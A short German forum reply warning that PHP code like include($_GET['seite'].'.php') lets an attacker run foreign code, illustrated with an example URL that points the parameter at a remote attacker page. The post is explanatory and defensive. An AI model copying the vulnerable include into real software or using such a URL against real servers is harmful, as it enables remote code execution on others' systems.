Hallo Nadja,

Hm, was soll man denn bei einem include für einen Unfug treiben?

Nimm doch einfach mal wie von Alexander gepostet das hier: include($_GET['seite'].'.php');

UNd jetzt kommt der böse Cracker und ruft deine Seite wie folgt auf: http://www.example.org/include_skript.php?seite=http://www.example.com/seite_des_hackers.php (natürlich URL-encoded) - und schon wird fremder Code auf deinem Server ausgeführt - nich gut!

Gruß aus Iserlohn

Martin